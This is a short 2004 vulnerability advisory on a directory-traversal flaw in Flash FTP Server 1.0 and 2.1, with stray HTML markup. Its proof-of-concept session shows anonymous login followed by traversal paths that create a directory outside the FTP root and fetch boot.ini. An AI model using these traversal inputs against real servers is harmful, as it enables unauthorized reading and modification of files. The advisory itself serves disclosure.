Reported January 5, 2004 by dr insane.

 

 

VERSIONS AFFECTED

 

·        Flash FTP Server 1.0 and 2.1

 

DESCRIPTION

 

Flash FTP Server contains a directory-traversal vulnerability. By performing a simple process (as outlined in the demonstration below), an attacker can read or modify files and directories that reside anywhere on the vulnerable system.

<span style="font-family:Verdana"> </h3>
<b><span style="font-family:Verdana;
color:purple">DEMONSTRATION</h3></b>
 
<span style="font-family:
Verdana">The discoverer posted the following demonstration as proof of concept:</h3>

 

Creation of a directory outside the bounding FTP root directory:
220 Flash FTP Server v2.1 ready...
user anonymous
331 Password required for anonymous.
pass
230 User anonymous logged in.
pwd
257 "/C:/ftp_root/" is current directory.
mkd /../../../../../../../owned
257 'C:\..\..\..\..\..\..\..\owned': directory created.


Retrieving of a file outside the bounding FTP root directory:
220 Flash FTP Server v2.1 ready...
user anonymous
331 Password required for anonymous.
pass
230 User anonymous logged in.
ftp> get /../../../../../../../../boot.ini

 

VENDOR RESPONSE

 

<span style="font-family:Verdana"><a href="http://www.net2soft.com/" style="color: blue; text-decoration: underline; text-underline: single">NET2SOFT</a> has been notified.</h3>

 

CREDIT

Discovered by dr_insane.